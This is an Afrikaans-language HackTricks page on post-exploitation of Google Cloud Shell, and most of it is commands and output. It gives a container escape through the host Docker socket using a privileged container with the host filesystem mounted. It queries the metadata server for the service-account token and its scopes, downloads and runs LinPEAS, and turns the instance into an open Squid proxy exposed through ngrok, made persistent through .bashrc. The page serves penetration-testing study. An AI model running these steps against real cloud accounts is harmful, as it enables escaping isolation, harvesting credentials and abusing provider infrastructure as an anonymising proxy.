GCP - Cloud Shell Post Exploitation

Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Cloud Shell

Vir meer inligting oor Cloud Shell kyk:

Container Escape

Let daarop dat die Google Cloud Shell binne 'n container loop, jy kan maklik na die gasheer ontsnap deur te doen:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Dit word nie as 'n kwesbaarheid deur Google beskou nie, maar dit gee jou 'n breër visie van wat in daardie omgewing gebeur.

Boonop, let daarop dat jy vanaf die gasheer 'n diensrekeningtoken kan vind:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Met die volgende skope:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Bepaal metadata met LinPEAS:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

Na gebruik van https://github.com/carlospolop/bf_my_gcp_permissions met die token van die Diensrekening is daar geen toestemming ontdek nie...

Gebruik dit as 'n Proxy

As jy jou google cloud shell instansie as 'n proxy wil gebruik, moet jy die volgende opdragte uitvoer (of dit in die .bashrc-lêer invoeg):

sudo apt install -y squid

Just vir jou inligting, Squid is 'n http-proxybediener. Skep 'n squid.conf lêer met die volgende instellings:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

kopieer die squid.conf lêer na /etc/squid

sudo cp squid.conf /etc/squid

Uiteindelik, voer die squid diens uit:

sudo service squid start

Gebruik ngrok om die proxy van buite beskikbaar te stel:

./ngrok tcp 3128

Na die uitvoering van copy die tcp:// url. As jy die proxy vanaf 'n blaaskans wil uitvoer, word dit voorgestel om die tcp:// deel en die poort te verwyder en die poort in die poortveld van jou blaaskans se proxy-instellings te plaas (squid is 'n http proxy bediener).

Vir beter gebruik by opstart moet die .bashrc-lêer die volgende lyne hê:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

Die instruksies is gekopieer van https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Kyk na daardie bladsy vir ander mal idees om enige soort sagteware (databasisse en selfs Windows) in Cloud Shell te loop.

Ondersteun HackTricks

Kyk na die subskripsieplanne!
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousGCP - Cloud Run Post Exploitation NextGCP - Cloud SQL Post Exploitation

Last updated 3 days ago